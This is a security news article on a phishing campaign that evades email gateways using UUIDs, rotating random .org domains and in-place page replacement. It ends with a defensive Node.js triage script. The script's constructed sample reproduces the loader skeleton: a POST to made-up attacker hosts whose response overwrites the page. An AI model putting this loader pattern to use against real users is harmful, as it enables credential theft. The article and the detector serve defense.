Monday, December 1

New Phishing Attack Uses Unique UUIDs to Bypass Secure Email Gateways


A new phishing campaign that uses randomly generated Universally Unique Identifiers (UUIDs) has been identified; it slips past Secure Email Gateways (SEGs) and other perimeter defenses.

The attack relies on a JavaScript-based phishing script that combines random domain selection, dynamic UUID generation, and server-driven page replacement to harvest credentials.

The script is delivered inside HTML attachments or on pages that spoof file-sharing and e-signature services such as Microsoft OneDrive, SharePoint Online, DocuSign, and Adobe Acrobat Sign.

When the user interacts with the apparently legitimate document, the script runs and selects one of nine predefined .org domains at random.

These domains are bulk-generated names with no recognizable word patterns, chosen to evade blocklists and machine-learning detection that keys on lookalike or keyword-bearing domains.

The script generates a dynamic UUID to track each individual victim, while a hardcoded UUID serves as the campaign identifier. That hardcoded value is constant across samples of one campaign, which also makes it a usable indicator when triaging attachments.

Cofense researchers first identified this tactic in early February 2025 and describe the campaign as sophisticated and ongoing. The dual-UUID mechanism is uncommon in phishing operations.

After selecting a domain and generating the UUIDs, the script sends an HTTPS POST request to an API endpoint on that domain.

The server responds with content tailored to the victim, such as a corporate login page branded for their organization, and the script writes that content into the current page without changing the URL shown in the address bar.

Dynamic Page Replacement

The dynamic page-replacement capability delivers the credential-phishing page without a traditional redirect, so the browser never navigates away and the URL in the address bar never changes.

Instead of a window.location.href redirect, the script uses DOM manipulation to replace the page's content with the HTML returned by the server.

This server-driven approach allows real-time customization based on the victim's context. When the victim enters an email address, the script extracts the domain part and sends it to the backend, which returns a login page branded for that organization.

This personalization builds trust and lowers suspicion, making credential harvesting more likely; it also shows how far modern phishing kits have moved beyond simple email deception.
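As an added illustration for defenders (not code from Cofense or from the campaign itself), the following Node.js script statically triages an HTML attachment for the indicators described above: a hardcoded UUID literal, runtime UUID generation, a pool of random-looking .org domains, a POST to an API, DOM replacement with no location.href redirect, and extraction of the domain from an entered email address. The two embedded HTML samples are constructed for this example; the domain names, the campaign UUID, the /api/v1/page path, the regular expressions, the entropy thresholds and the weights are all assumptions, not indicators taken from the real campaign.

```javascript
// Added example: static triage of an HTML attachment for the indicators
// described in the article. Not the campaign's script and not Cofense code;
// all patterns, thresholds, weights and sample inputs are assumptions.

// Hardcoded UUID literal in string form, as used for the campaign identifier.
const UUID_LITERAL = /["']([0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12})["']/gi;
// Runtime UUID generation: the Web Crypto API or common hand-rolled v4 generators.
const UUID_GEN = /crypto\.randomUUID\s*\(|\[1e7\]\s*\+\s*-1e3|xxxxxxxx-xxxx-4xxx/;
// Any hostname under .org; the registrable label is classified separately.
const ORG_HOST = /\b([a-z0-9-]+(?:\.[a-z0-9-]+)*)\.org\b/gi;
const POST_CALL = /method\s*:\s*["']POST["']|\.open\s*\(\s*["']POST["']/i;
const DOM_REPLACE = /document\.(?:write|open)\s*\(|documentElement\.innerHTML\s*=|document\.body\.innerHTML\s*=|\.replaceWith\s*\(/;
const REDIRECT = /location\.(?:href|replace|assign)/;
const EMAIL_SPLIT = /split\s*\(\s*["']@["']\s*\)/;

// Shannon entropy (bits per character) of a string.
function entropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Bulk-generated labels tend to be long, high-entropy and vowel-poor,
// unlike dictionary words or brand names. The thresholds are assumptions.
function looksGenerated(label) {
  const vowels = (label.match(/[aeiou]/g) || []).length;
  return label.length >= 8 && entropy(label) >= 3.0 && vowels / label.length < 0.3;
}

function analyseAttachment(html) {
  const hits = [];
  const add = (name, weight, evidence) => hits.push({ name, weight, evidence });

  const uuids = [...html.matchAll(UUID_LITERAL)].map(m => m[1]);
  if (uuids.length) add('hardcoded_uuid_literal', 2, uuids);
  if (UUID_GEN.test(html)) add('runtime_uuid_generation', 2, html.match(UUID_GEN)[0]);

  // Registrable label of every .org host, deduplicated, then classified.
  const labels = [...html.matchAll(ORG_HOST)].map(m => m[1].toLowerCase().split('.').pop());
  const generated = [...new Set(labels)].filter(looksGenerated);
  if (generated.length >= 3) add('random_org_domain_pool', 3, generated);

  if (POST_CALL.test(html)) add('post_to_api', 1, html.match(POST_CALL)[0]);
  // Content swapped into the live document with no navigation: the URL never changes.
  if (DOM_REPLACE.test(html) && !REDIRECT.test(html)) {
    add('dom_replacement_without_redirect', 3, html.match(DOM_REPLACE)[0]);
  }
  if (EMAIL_SPLIT.test(html)) add('email_domain_extraction', 1, html.match(EMAIL_SPLIT)[0]);

  const score = hits.reduce((sum, h) => sum + h.weight, 0);
  return { score, verdict: score >= 6 ? 'suspicious' : 'clean', hits, generatedDomains: generated };
}

// Constructed sample imitating the described flow (random host, two UUIDs,
// POST, DOM replacement, email-domain extraction). Domains, UUID and path are made up.
const SUSPICIOUS_SAMPLE = `
<html><body>
<p>Loading your shared document...</p>
<script>
  const hosts = ["xq7vkzt9rw.org", "bm3pdlsz2k.org", "ntr8qvcx4h.org",
                 "zjk2fwdy7m.org", "pv9cxtq3sb.org", "hk4rnz8lwt.org",
                 "dq2mxsv7kp.org", "wrt6zbq9jn.org", "kx3lpvh8qd.org"];
  const campaign = "3f2b9c1e-8a4d-4f6b-9e1a-2c5d7b8f0a13";
  const victim = crypto.randomUUID();
  const host = hosts[Math.floor(Math.random() * hosts.length)];
  fetch("https://" + host + "/api/v1/page", {
    method: "POST",
    body: JSON.stringify({ campaign, victim, email: "" })
  }).then(r => r.text()).then(html => {
    document.documentElement.innerHTML = html;
  });
  function onEmail(e) { const domain = e.split("@")[1]; }
</script>
</body></html>`;

// Constructed benign page: a form that POSTs and then redirects normally.
const BENIGN_SAMPLE = `
<html><body>
<form id="f"><input name="email"><button>Continue</button></form>
<script>
  document.getElementById("f").addEventListener("submit", async (ev) => {
    ev.preventDefault();
    await fetch("https://portal.example.org/api/subscribe", { method: "POST", body: new FormData(ev.target) });
    window.location.href = "https://portal.example.org/thanks";
  });
</script>
</body></html>`;

console.log(analyseAttachment(SUSPICIOUS_SAMPLE));
console.log(analyseAttachment(BENIGN_SAMPLE).verdict);
```

The scoring deliberately weights the two features that defeat URL-centric controls, the generated-domain pool and the in-place DOM replacement, more heavily than a plain POST, which legitimate pages do all the time; the hardcoded UUID is worth extracting on its own, since a constant value shared across samples is a cheap way to cluster attachments from one campaign.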
